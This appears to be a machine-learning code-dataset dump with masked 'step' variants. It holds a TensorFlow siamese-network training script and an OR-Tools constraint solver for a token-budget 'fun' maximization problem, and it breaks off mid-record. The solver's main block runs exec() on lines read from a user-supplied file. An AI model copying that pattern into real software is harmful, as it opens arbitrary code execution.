'{}={}'.format(bn_moving_vars\n [0].name, np.mean(one_moving_meaning.eval()))\n print(one_moving_meaning_show)\n show_text = (\n 'epoch:{},epoch-iters:{},total-iters:{},loss:{},lr:{},val:{}'\n .format(epoch_num, iters_num + 1, _global_step,\n _train_loss, '0.99', _test_loss))\n print(show_text)\n if _global_step % snapshot == 0:\n constant_graph = graph_util.convert_variables_to_constants(\n sess, sess.graph_def, ['flatten_anchor'])\n save_model_name = model_name + '-' + str(_global_step\n ) + '.pb'\n with tf.gfile.FastGFile(pb_path + save_model_name, mode\n ='wb') as fw:\n fw.write(constant_graph.SerializeToString())\n ckpt_saver.save(sess, ckpt_path + model_name + '.ckpt',\n global_step=total_iters_num)\n print('Successfully saved model {}'.format(save_model_name)\n )\n", "step-3": "<mask token>\nbatch_size = 64\ninput_height = 32\ninput_width = 32\ntotal_epoch_num = 50\nsnapshot = 100\nsupport_image_extensions = ['.jpg', '.png', '.jpeg', '.bmp']\nmargin = 1.0\nchannals = 3\ntrain_image_root = 'D:/forTensorflow/charRecTrain/forMyDNNCode/train'\ntest_image_root = 'D:/forTensorflow/charRecTrain/forMyDNNCode/test'\nmodel_path = 'models/'\npb_path = os.path.join(model_path, 'pb/')\nckpt_path = os.path.join(model_path, 'ckpt/')\nif not os.path.exists(pb_path):\n os.makedirs(pb_path)\nif not os.path.exists(ckpt_path):\n os.makedirs(ckpt_path)\nmodel_name = 'siamese_triplet_28out_allloss_bn'\nif __name__ == '__main__':\n first_shape = None\n anchor_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='anchor')\n similar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='similar')\n dissimilar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='dissimilar')\n labels_placeholder = tf.placeholder(tf.float32, shape=[None if \n first_shape is None else first_shape * 3], name='labels')\n is_training_placeholder = tf.placeholder_with_default(False, shape=(),\n name='is_training')\n siamese_net = siameseNet.siameseNet()\n anchor = siamese_net.inference(anchor_placeholder, reuse=False,\n is_training=is_training_placeholder)\n similar = siamese_net.inference(similar_placeholder, reuse=True,\n is_training=is_training_placeholder)\n dissimilar = siamese_net.inference(dissimilar_placeholder, reuse=True,\n is_training=is_training_placeholder)\n loss, pos_dist, neg_dist = siamese_net.loss(anchor, similar, dissimilar,\n labels_placeholder, margin)\n flatten_out_anchor = tf.identity(anchor, name='flatten_anchor')\n flatten_out_similar = tf.identity(similar, name='flatten_similar')\n flatten_out_dissimilar = tf.identity(dissimilar, name='flatten_dissimilar')\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n global_step = tf.Variable(0, trainable=False)\n with tf.control_dependencies([tf.group(*update_ops)]):\n train_step = tf.train.MomentumOptimizer(0.01, 0.9).minimize(loss,\n global_step=global_step)\n var_list = tf.trainable_variables()\n if global_step is not None:\n var_list.append(global_step)\n g_list = tf.global_variables()\n bn_moving_vars = [g for g in g_list if 'moving_mean' in g.name]\n bn_moving_vars += [g for g in g_list if 'moving_variance' in g.name]\n var_list += bn_moving_vars\n ckpt_saver = tf.train.Saver()\n train_dataset = dataset.dataset(train_image_root, batch_size,\n support_image_extensions, input_height, input_width, channals)\n test_dataset = dataset.dataset(test_image_root, batch_size,\n support_image_extensions, input_height, input_width, channals)\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n total_iters_num = 0\n for epoch_num in range(total_epoch_num):\n train_images_num = train_dataset.sample_len\n cur_epoch_iters_num = train_images_num // batch_size\n for iters_num in range(cur_epoch_iters_num):\n (train_anchor, train_similar, train_dissimilar, train_labels\n ) = train_dataset.next_triplet_batch()\n test_anchor, test_similar, test_dissimilar, test_labels = (\n test_dataset.next_triplet_batch())\n if train_anchor is None or test_anchor is None:\n continue\n train_dict = {anchor_placeholder: train_anchor,\n similar_placeholder: train_similar,\n dissimilar_placeholder: train_dissimilar,\n labels_placeholder: train_labels,\n is_training_placeholder: True}\n test_dict = {anchor_placeholder: test_anchor,\n similar_placeholder: test_similar,\n dissimilar_placeholder: test_dissimilar,\n labels_placeholder: test_labels,\n is_training_placeholder: False}\n _, _global_step = sess.run([train_step, global_step],\n feed_dict=train_dict)\n anchor_out, similar_out, dissimilar_out = sess.run([\n flatten_out_anchor, flatten_out_similar,\n flatten_out_dissimilar], feed_dict=train_dict)\n _train_loss, _train_pos_dist, _train_neg_dist = sess.run([\n loss, pos_dist, neg_dist], feed_dict=train_dict)\n _test_loss, _test_pos_dist, _test_neg_dist = sess.run([loss,\n pos_dist, neg_dist], feed_dict=test_dict)\n print('distance:', list(zip(_train_pos_dist.flatten(),\n _train_neg_dist.flatten()))[:5])\n one_moving_meaning_show = 'No mean or variance'\n if len(bn_moving_vars) > 0:\n one_moving_meaning = sess.graph.get_tensor_by_name(\n bn_moving_vars[0].name)\n one_moving_meaning_show = '{}={}'.format(bn_moving_vars\n [0].name, np.mean(one_moving_meaning.eval()))\n print(one_moving_meaning_show)\n show_text = (\n 'epoch:{},epoch-iters:{},total-iters:{},loss:{},lr:{},val:{}'\n .format(epoch_num, iters_num + 1, _global_step,\n _train_loss, '0.99', _test_loss))\n print(show_text)\n if _global_step % snapshot == 0:\n constant_graph = graph_util.convert_variables_to_constants(\n sess, sess.graph_def, ['flatten_anchor'])\n save_model_name = model_name + '-' + str(_global_step\n ) + '.pb'\n with tf.gfile.FastGFile(pb_path + save_model_name, mode\n ='wb') as fw:\n fw.write(constant_graph.SerializeToString())\n ckpt_saver.save(sess, ckpt_path + model_name + '.ckpt',\n global_step=total_iters_num)\n print('Successfully saved model {}'.format(save_model_name)\n )\n", "step-4": "import tensorflow as tf\nfrom tensorflow.python.framework import graph_util\nfrom net import siameseNet_batchnorm as siameseNet\nimport dataset\nimport numpy as np\nimport cv2\nimport os\nbatch_size = 64\ninput_height = 32\ninput_width = 32\ntotal_epoch_num = 50\nsnapshot = 100\nsupport_image_extensions = ['.jpg', '.png', '.jpeg', '.bmp']\nmargin = 1.0\nchannals = 3\ntrain_image_root = 'D:/forTensorflow/charRecTrain/forMyDNNCode/train'\ntest_image_root = 'D:/forTensorflow/charRecTrain/forMyDNNCode/test'\nmodel_path = 'models/'\npb_path = os.path.join(model_path, 'pb/')\nckpt_path = os.path.join(model_path, 'ckpt/')\nif not os.path.exists(pb_path):\n os.makedirs(pb_path)\nif not os.path.exists(ckpt_path):\n os.makedirs(ckpt_path)\nmodel_name = 'siamese_triplet_28out_allloss_bn'\nif __name__ == '__main__':\n first_shape = None\n anchor_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='anchor')\n similar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='similar')\n dissimilar_placeholder = tf.placeholder(tf.float32, shape=[first_shape,\n input_height, input_width, channals], name='dissimilar')\n labels_placeholder = tf.placeholder(tf.float32, shape=[None if \n first_shape is None else first_shape * 3], name='labels')\n is_training_placeholder = tf.placeholder_with_default(False, shape=(),\n name='is_training')\n siamese_net = siameseNet.siameseNet()\n anchor = siamese_net.inference(anchor_placeholder, reuse=False,\n is_training=is_training_placeholder)\n similar = siamese_net.inference(similar_placeholder, reuse=True,\n is_training=is_training_placeholder)\n dissimilar = siamese_net.inference(dissimilar_placeholder, reuse=True,\n is_training=is_training_placeholder)\n loss, pos_dist, neg_dist = siamese_net.loss(anchor, similar, dissimilar,\n labels_placeholder, margin)\n flatten_out_anchor = tf.identity(anchor, name='flatten_anchor')\n flatten_out_similar = tf.identity(similar, name='flatten_similar')\n flatten_out_dissimilar = tf.identity(dissimilar, name='flatten_dissimilar')\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n global_step = tf.Variable(0, trainable=False)\n with tf.control_dependencies([tf.group(*update_ops)]):\n train_step = tf.train.MomentumOptimizer(0.01, 0.9).minimize(loss,\n global_step=global_step)\n var_list = tf.trainable_variables()\n if global_step is not None:\n var_list.append(global_step)\n g_list = tf.global_variables()\n bn_moving_vars = [g for g in g_list if 'moving_mean' in g.name]\n bn_moving_vars += [g for g in g_list if 'moving_variance' in g.name]\n var_list += bn_moving_vars\n ckpt_saver = tf.train.Saver()\n train_dataset = dataset.dataset(train_image_root, batch_size,\n support_image_extensions, input_height, input_width, channals)\n test_dataset = dataset.dataset(test_image_root, batch_size,\n support_image_extensions, input_height, input_width, channals)\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n total_iters_num = 0\n for epoch_num in range(total_epoch_num):\n train_images_num = train_dataset.sample_len\n cur_epoch_iters_num = train_images_num // batch_size\n for iters_num in range(cur_epoch_iters_num):\n (train_anchor, train_similar, train_dissimilar, train_labels\n ) = train_dataset.next_triplet_batch()\n test_anchor, test_similar, test_dissimilar, test_labels = (\n test_dataset.next_triplet_batch())\n if train_anchor is None or test_anchor is None:\n continue\n train_dict = {anchor_placeholder: train_anchor,\n similar_placeholder: train_similar,\n dissimilar_placeholder: train_dissimilar,\n labels_placeholder: train_labels,\n is_training_placeholder: True}\n test_dict = {anchor_placeholder: test_anchor,\n similar_placeholder: test_similar,\n dissimilar_placeholder: test_dissimilar,\n labels_placeholder: test_labels,\n is_training_placeholder: False}\n _, _global_step = sess.run([train_step, global_step],\n feed_dict=train_dict)\n anchor_out, similar_out, dissimilar_out = sess.run([\n flatten_out_anchor, flatten_out_similar,\n flatten_out_dissimilar], feed_dict=train_dict)\n _train_loss, _train_pos_dist, _train_neg_dist = sess.run([\n loss, pos_dist, neg_dist], feed_dict=train_dict)\n _test_loss, _test_pos_dist, _test_neg_dist = sess.run([loss,\n pos_dist, neg_dist], feed_dict=test_dict)\n print('distance:', list(zip(_train_pos_dist.flatten(),\n _train_neg_dist.flatten()))[:5])\n one_moving_meaning_show = 'No mean or variance'\n if len(bn_moving_vars) > 0:\n one_moving_meaning = sess.graph.get_tensor_by_name(\n bn_moving_vars[0].name)\n one_moving_meaning_show = '{}={}'.format(bn_moving_vars\n [0].name, np.mean(one_moving_meaning.eval()))\n print(one_moving_meaning_show)\n show_text = (\n 'epoch:{},epoch-iters:{},total-iters:{},loss:{},lr:{},val:{}'\n .format(epoch_num, iters_num + 1, _global_step,\n _train_loss, '0.99', _test_loss))\n print(show_text)\n if _global_step % snapshot == 0:\n constant_graph = graph_util.convert_variables_to_constants(\n sess, sess.graph_def, ['flatten_anchor'])\n save_model_name = model_name + '-' + str(_global_step\n ) + '.pb'\n with tf.gfile.FastGFile(pb_path + save_model_name, mode\n ='wb') as fw:\n fw.write(constant_graph.SerializeToString())\n ckpt_saver.save(sess, ckpt_path + model_name + '.ckpt',\n global_step=total_iters_num)\n print('Successfully saved model {}'.format(save_model_name)\n )\n", "step-5": "import tensorflow as tf\nfrom tensorflow.python.framework import graph_util\nfrom net import siameseNet_batchnorm as siameseNet\nimport dataset\nimport numpy as np\nimport cv2\nimport os\n\nbatch_size=64\ninput_height=32\ninput_width=32\ntotal_epoch_num=50\nsnapshot=100\nsupport_image_extensions=[\".jpg\",\".png\",\".jpeg\",\".bmp\"]\nmargin=1.0\nchannals=3\n\ntrain_image_root=\"D:/forTensorflow/charRecTrain/forMyDNNCode/train\"\ntest_image_root=\"D:/forTensorflow/charRecTrain/forMyDNNCode/test\"\n\nmodel_path=\"models/\"\npb_path=os.path.join(model_path,\"pb/\")\nckpt_path=os.path.join(model_path,\"ckpt/\")\n\nif not os.path.exists(pb_path):\n os.makedirs(pb_path)\nif not os.path.exists(ckpt_path):\n os.makedirs(ckpt_path)\nmodel_name=\"siamese_triplet_28out_allloss_bn\"\n\nif __name__ == '__main__':\n # image_paths,labels=get_images_path(test_image_root)\n # data=next_batch(True,None,image_paths,labels)\n # for left,right,label in zip(*data):\n # cv2.imshow(\"left\",left)\n # cv2.imshow(\"right\", right)\n # print(label)\n # cv2.waitKey(0)\n\n first_shape=None\n anchor_placeholder = tf.placeholder(tf.float32,shape=[first_shape,input_height,input_width,channals],name=\"anchor\")\n similar_placeholder = tf.placeholder(tf.float32, shape=[first_shape, input_height, input_width, channals], name=\"similar\")\n dissimilar_placeholder = tf.placeholder(tf.float32, shape=[first_shape, input_height, input_width, channals], name=\"dissimilar\")\n labels_placeholder = tf.placeholder(tf.float32, shape=\n [None if first_shape is None else first_shape * 3, ], name=\"labels\")\n is_training_placeholder = tf.placeholder_with_default(False, shape=(), name=\"is_training\")\n siamese_net=siameseNet.siameseNet()\n\n anchor = siamese_net.inference(anchor_placeholder,reuse=False,is_training=is_training_placeholder)\n similar = siamese_net.inference(similar_placeholder,reuse=True,is_training=is_training_placeholder)\n dissimilar = siamese_net.inference(dissimilar_placeholder,reuse=True,is_training=is_training_placeholder)\n loss,pos_dist,neg_dist = siamese_net.loss(anchor,similar,dissimilar,labels_placeholder,margin)\n\n flatten_out_anchor = tf.identity(anchor, name=\"flatten_anchor\")\n flatten_out_similar = tf.identity(similar, name=\"flatten_similar\")\n flatten_out_dissimilar = tf.identity(dissimilar, name=\"flatten_dissimilar\")\n\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n global_step = tf.Variable(0, trainable=False)\n # learning_rate = tf.train.exponential_decay(0.01, global_step, 100, 0.9)\n # optimizer = tf.train.MomentumOptimizer(learning_rate, 0.9)\n\n with tf.control_dependencies([tf.group(*update_ops)]):\n # train_step = optimizer.minimize(loss, global_step)\n train_step = tf.train.MomentumOptimizer(0.01, 0.90).\\\n minimize(loss, global_step=global_step)\n\n var_list = tf.trainable_variables()\n if global_step is not None:\n var_list.append(global_step)\n g_list = tf.global_variables() # 从全局变量中获得batch norm的缩放和偏差\n bn_moving_vars = [g for g in g_list if 'moving_mean' in g.name]\n bn_moving_vars += [g for g in g_list if 'moving_variance' in g.name]\n var_list += bn_moving_vars\n\n ckpt_saver = tf.train.Saver()\n train_dataset = dataset.dataset(train_image_root,batch_size,support_image_extensions,\n input_height,input_width,channals)\n\n test_dataset = dataset.dataset(test_image_root, batch_size, support_image_extensions,\n input_height, input_width, channals)\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n # if os.path.exists(os.path.join(ckpt_path, \"checkpoint\")):\n # ckpt_saver.restore(sess, tf.train.latest_checkpoint(ckpt_path))\n\n total_iters_num = 0\n for epoch_num in range(total_epoch_num):\n\n train_images_num = train_dataset.sample_len\n cur_epoch_iters_num = train_images_num // batch_size\n for iters_num in range(cur_epoch_iters_num):\n\n train_anchor, train_similar, train_dissimilar,train_labels = \\\n train_dataset.next_triplet_batch()\n test_anchor, test_similar, test_dissimilar,test_labels = \\\n test_dataset.next_triplet_batch()\n\n if train_anchor is None or test_anchor is None:\n continue\n train_dict = {anchor_placeholder: train_anchor,\n similar_placeholder: train_similar,\n dissimilar_placeholder: train_dissimilar,\n\t\t\t\t\t\t\t labels_placeholder:train_labels,\n is_training_placeholder:True}\n test_dict = {anchor_placeholder: test_anchor,\n similar_placeholder: test_similar,\n dissimilar_placeholder: test_dissimilar,\n\t\t\t\t\t\t\t labels_placeholder:test_labels,\n is_training_placeholder: False}\n _,_global_step=sess.run([train_step,global_step], feed_dict=train_dict)\n\n anchor_out,similar_out,dissimilar_out = sess.run([\n flatten_out_anchor,flatten_out_similar,flatten_out_dissimilar],\n feed_dict=train_dict)\n\n _train_loss,_train_pos_dist,_train_neg_dist = \\\n sess.run([loss,pos_dist,neg_dist], feed_dict=train_dict)\n _test_loss,_test_pos_dist,_test_neg_dist =\\\n sess.run([loss,pos_dist,neg_dist], feed_dict=test_dict)\n\n print(\"distance:\",list(zip(_train_pos_dist.flatten(),_train_neg_dist.flatten()))[:5])\n one_moving_meaning_show = \"No mean or variance\"\n if len(bn_moving_vars) > 0:\n one_moving_meaning = sess.graph.get_tensor_by_name(bn_moving_vars[0].name)\n one_moving_meaning_show = \"{}={}\".\\\n format(bn_moving_vars[0].name,np.mean(one_moving_meaning.eval()))\n\n print(one_moving_meaning_show)\n show_text = \"epoch:{},epoch-iters:{},total-iters:{},loss:{},lr:{},val:{}\".format \\\n (epoch_num, iters_num + 1, _global_step, _train_loss, \"0.99\", _test_loss)\n print(show_text)\n\n if _global_step % snapshot == 0:\n # 保存PB\n constant_graph = graph_util.convert_variables_to_constants(sess, sess.graph_def, [\"flatten_anchor\"])\n save_model_name=model_name + \"-\" + str(_global_step) + \".pb\"\n with tf.gfile.FastGFile(pb_path + save_model_name, mode=\"wb\") as fw:\n fw.write(constant_graph.SerializeToString())\n # 保存CKPT\n ckpt_saver.save(sess, ckpt_path + model_name + \".ckpt\", global_step=total_iters_num)\n print(\"Successfully saved model {}\".format(save_model_name))\n\n\n\n\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
from ortools.sat.python import cp_model import os import math import csv import sys def ortoolsSolverReduceVar(num, cap, refill, fun, goal): model = cp_model.CpModel() token = [model.NewIntVar(-2147483648, 2147483647, 't%i' % i) for i in range(1, num + 1)] play = [model.NewIntVar(-2147483648, 2147483647, 'q%i' % i) for i in range(1, num + 1)] compare = [model.NewBoolVar('c%i' % i) for i in range(1, num + 1)] total_fun = sum([fun[i] * play[i] for i in range(num)]) model.Add(total_fun >= goal) model.Add(token[0] == cap) for i in range(num): model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i]) model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare[i].Not()) model.Add(play[i] >= 1) model.Add(play[i] <= token[i]) for i in range(1, num): model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1]) model.Add(token[i] == token[i - 1] - play[i - 1] + refill).OnlyEnforceIf(compare[i - 1].Not()) model.Maximize(total_fun) solver = cp_model.CpSolver() status = solver.Solve(model) sat = solver.StatusName() time = solver.UserTime() if status == cp_model.INFEASIBLE: token = None play = None total_fun = None else: token = [solver.Value(token[i]) for i in range(num)] play = [solver.Value(play[i]) for i in range(num)] total_fun = solver.Value(total_fun) return [sat, token, play, total_fun, time] def ortoolsSolverRange(num, cap, refill, fun, goal): model = cp_model.CpModel() token = [model.NewIntVar(1, cap, 't%i' % i) for i in range(1, num + 1)] play = [model.NewIntVar(1, cap, 'q%i' % i) for i in range(1, num + 1)] compare = [model.NewBoolVar('c%i' % i) for i in range(1, num + 1)] total_fun = model.NewIntVar(-100, 1000, 'total_fun') model.Add(total_fun == sum([fun[i] * play[i] for i in range(num)])) model.Add(total_fun >= goal) model.Add(token[0] == cap) for i in range(num): model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i]) model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare[i].Not()) model.Add(play[i] >= 1) model.Add(play[i] <= token[i]) for i in range(1, num): model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1]) model.Add(token[i] == token[i - 1] - play[i - 1] + refill).OnlyEnforceIf(compare[i - 1].Not()) model.Maximize(total_fun) solver = cp_model.CpSolver() status = solver.Solve(model) sat = solver.StatusName() time = solver.UserTime() if status == cp_model.INFEASIBLE: token = None play = None total_fun = None else: token = [solver.Value(token[i]) for i in range(num)] play = [solver.Value(play[i]) for i in range(num)] total_fun = solver.Value(total_fun) return [sat, token, play, total_fun, time] def ortoolsSolverNeg(num, cap, refill, fun, goal): model = cp_model.CpModel() token = [model.NewIntVar(-2147483648, 2147483647, 't%i' % i) for i in range(1, num + 1)] play = [model.NewIntVar(-2147483648, 2147483647, 'q%i' % i) for i in range(1, num + 1)] compare = [model.NewBoolVar('c%i' % i) for i in range(1, num + 1)] neg = [model.NewBoolVar('n%i' % i) for i in range(1, num + 1)] total_fun = model.NewIntVar(-2147483648, 2147483647, 'total_fun') model.Add(total_fun == sum([fun[i] * play[i] for i in range(num)])) model.Add(total_fun >= goal) model.Add(token[0] == cap) for i in range(num): model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i]) model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare[i].Not()) model.Add(fun[i] < 0).OnlyEnforceIf(neg[i]) model.Add(fun[i] >= 0).OnlyEnforceIf(neg[i].Not()) model.Add(play[i] <= token[i]) model.Add(play[i] == 1).OnlyEnforceIf(neg[i]) model.Add(play[i] >= 1).OnlyEnforceIf(neg[i].Not()) for i in range(1, num): model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1]) model.Add(token[i] == token[i - 1] - play[i - 1] + refill).OnlyEnforceIf(compare[i - 1].Not()) model.Maximize(total_fun) solver = cp_model.CpSolver() status = solver.Solve(model) sat = solver.StatusName() time = solver.UserTime() if status == cp_model.INFEASIBLE: token = None play = None total_fun = None else: token = [solver.Value(token[i]) for i in range(num)] play = [solver.Value(play[i]) for i in range(num)] total_fun = solver.Value(total_fun) return [sat, token, play, total_fun, time] def ortoolsSolverComb(num, cap, refill, fun, goal): model = cp_model.CpModel() token = [model.NewIntVar(1, cap, 't%i' % i) for i in range(1, num + 1)] play = [model.NewIntVar(1, cap, 'q%i' % i) for i in range(1, num + 1)] compare = [model.NewBoolVar('c%i' % i) for i in range(1, num + 1)] neg = [model.NewBoolVar('n%i' % i) for i in range(1, num + 1)] total_fun = sum([fun[i] * play[i] for i in range(num)]) model.Add(total_fun >= goal) model.Add(token[0] == cap) for i in range(num): model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i]) model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare[i].Not()) model.Add(fun[i] < 0).OnlyEnforceIf(neg[i]) model.Add(fun[i] >= 0).OnlyEnforceIf(neg[i].Not()) model.Add(play[i] <= token[i]) model.Add(play[i] == 1).OnlyEnforceIf(neg[i]) model.Add(play[i] >= 1).OnlyEnforceIf(neg[i].Not()) for i in range(1, num): model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1]) model.Add(token[i] == token[i - 1] - play[i - 1] + refill).OnlyEnforceIf(compare[i - 1].Not()) model.Maximize(total_fun) solver = cp_model.CpSolver() status = solver.Solve(model) sat = solver.StatusName() time = solver.UserTime() if status == cp_model.INFEASIBLE: token = None play = None total_fun = None else: token = [solver.Value(token[i]) for i in range(num)] play = [solver.Value(play[i]) for i in range(num)] total_fun = solver.Value(total_fun) return [sat, token, play, total_fun, time] if __name__ == '__main__': file = sys.argv[1] f = open(file) for i in range(5): exec(f.readline()) f.close() [sat, token, play, total_fun, time] = ortoolsSolverComb( num, cap, refill, fun, goal) print('Status:', sat) if sat == 'OPTIMAL': print('Maximum total fun:', total_fun)
normal
{ "blob_id": "da98835e48a759cbe7bd29ddba1fac20c006827d", "index": 4996, "step-1": "<mask token>\n\n\ndef ortoolsSolverRange(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(1, cap, 't%i' % i) for i in range(1, num + 1)]\n play = [model.NewIntVar(1, cap, 'q%i' % i) for i in range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i) for i in range(1, num + 1)]\n total_fun = model.NewIntVar(-100, 1000, 'total_fun')\n model.Add(total_fun == sum([(fun[i] * play[i]) for i in range(num)]))\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare\n [i].Not())\n model.Add(play[i] >= 1)\n model.Add(play[i] <= token[i])\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] + refill\n ).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\n\n<mask token>\n\n\ndef ortoolsSolverComb(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(1, cap, 't%i' % i) for i in range(1, num + 1)]\n play = [model.NewIntVar(1, cap, 'q%i' % i) for i in range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i) for i in range(1, num + 1)]\n neg = [model.NewBoolVar('n%i' % i) for i in range(1, num + 1)]\n total_fun = sum([(fun[i] * play[i]) for i in range(num)])\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare\n [i].Not())\n model.Add(fun[i] < 0).OnlyEnforceIf(neg[i])\n model.Add(fun[i] >= 0).OnlyEnforceIf(neg[i].Not())\n model.Add(play[i] <= token[i])\n model.Add(play[i] == 1).OnlyEnforceIf(neg[i])\n model.Add(play[i] >= 1).OnlyEnforceIf(neg[i].Not())\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] + refill\n ).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef ortoolsSolverReduceVar(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(-2147483648, 2147483647, 't%i' % i) for i in\n range(1, num + 1)]\n play = [model.NewIntVar(-2147483648, 2147483647, 'q%i' % i) for i in\n range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i) for i in range(1, num + 1)]\n total_fun = sum([(fun[i] * play[i]) for i in range(num)])\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare\n [i].Not())\n model.Add(play[i] >= 1)\n model.Add(play[i] <= token[i])\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] + refill\n ).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\n\ndef ortoolsSolverRange(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(1, cap, 't%i' % i) for i in range(1, num + 1)]\n play = [model.NewIntVar(1, cap, 'q%i' % i) for i in range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i) for i in range(1, num + 1)]\n total_fun = model.NewIntVar(-100, 1000, 'total_fun')\n model.Add(total_fun == sum([(fun[i] * play[i]) for i in range(num)]))\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare\n [i].Not())\n model.Add(play[i] >= 1)\n model.Add(play[i] <= token[i])\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] + refill\n ).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = [solver.Value(token[i]) for i in range(num)]\n play = [solver.Value(play[i]) for i in range(num)]\n total_fun = solver.Value(total_fun)\n return [sat, token, play, total_fun, time]\n\n\ndef ortoolsSolverNeg(num, cap, refill, fun, goal):\n model = cp_model.CpModel()\n token = [model.NewIntVar(-2147483648, 2147483647, 't%i' % i) for i in\n range(1, num + 1)]\n play = [model.NewIntVar(-2147483648, 2147483647, 'q%i' % i) for i in\n range(1, num + 1)]\n compare = [model.NewBoolVar('c%i' % i) for i in range(1, num + 1)]\n neg = [model.NewBoolVar('n%i' % i) for i in range(1, num + 1)]\n total_fun = model.NewIntVar(-2147483648, 2147483647, 'total_fun')\n model.Add(total_fun == sum([(fun[i] * play[i]) for i in range(num)]))\n model.Add(total_fun >= goal)\n model.Add(token[0] == cap)\n for i in range(num):\n model.Add(token[i] - play[i] + refill > cap).OnlyEnforceIf(compare[i])\n model.Add(token[i] - play[i] + refill <= cap).OnlyEnforceIf(compare\n [i].Not())\n model.Add(fun[i] < 0).OnlyEnforceIf(neg[i])\n model.Add(fun[i] >= 0).OnlyEnforceIf(neg[i].Not())\n model.Add(play[i] <= token[i])\n model.Add(play[i] == 1).OnlyEnforceIf(neg[i])\n model.Add(play[i] >= 1).OnlyEnforceIf(neg[i].Not())\n for i in range(1, num):\n model.Add(token[i] == cap).OnlyEnforceIf(compare[i - 1])\n model.Add(token[i] == token[i - 1] - play[i - 1] + refill\n ).OnlyEnforceIf(compare[i - 1].Not())\n model.Maximize(total_fun)\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n sat = solver.StatusName()\n time = solver.UserTime()\n if status == cp_model.INFEASIBLE:\n token = None\n play = None\n total_fun = None\n else:\n token = 